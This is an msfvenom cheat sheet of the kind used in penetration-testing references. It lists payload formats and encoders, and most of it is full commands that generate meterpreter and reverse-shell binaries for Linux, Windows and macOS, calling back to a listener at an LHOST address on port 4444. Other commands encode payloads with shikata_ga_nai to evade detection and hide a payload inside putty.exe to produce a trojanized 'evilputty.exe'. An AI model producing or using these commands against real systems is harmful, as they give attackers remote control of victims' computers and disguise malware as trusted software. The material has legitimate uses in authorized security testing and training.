msfvenom

#MSFVenom CheatSheet
#Jose Moruno <www.sniferl4bs.com>
#Jason Soto <www.jsitech.com>

#Basic Syntax
msfvenom [options] <var=value>

#Payloads list
msfvenom -l

#Creating a Payload
$ msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]
# Format Options (Specified with -f) - Executable formats
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war                                                                                                 

#Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

#Generate binary Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<LOCAL IP> LPORT=<LOCAL PORT> -f elf > shell.elf

#Generate binary Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LOCAL IP> LPORT=<LOCAL PORT> -f exe -o shell.exe

#Generate binary MAC
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<LOCAL IP> LPORT=<LOCAL PORT> -f macho > shell.macho

#Web Payloads
#PHP


#Check payload options
$ msfvenom -p [payload] --payload-options

#Encoding a Payload
$ msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] <var=value> > outputfile

#Encoders Example
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.40 LPORT=4444 -e x86/shikata_ga_nai -f exe -o payload.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o payload.exe

#Example Remove Bad Characters
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -b ‘\x00′ -f exe -o payload.exe

#Creating a Payload using a template
msfvenom -p [payload] <var=value> -x [template] -f [formattype] > outputfile

#Example Creating executable payload using putty.exe as template
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -x putty.exe -f exe > evilputty.exe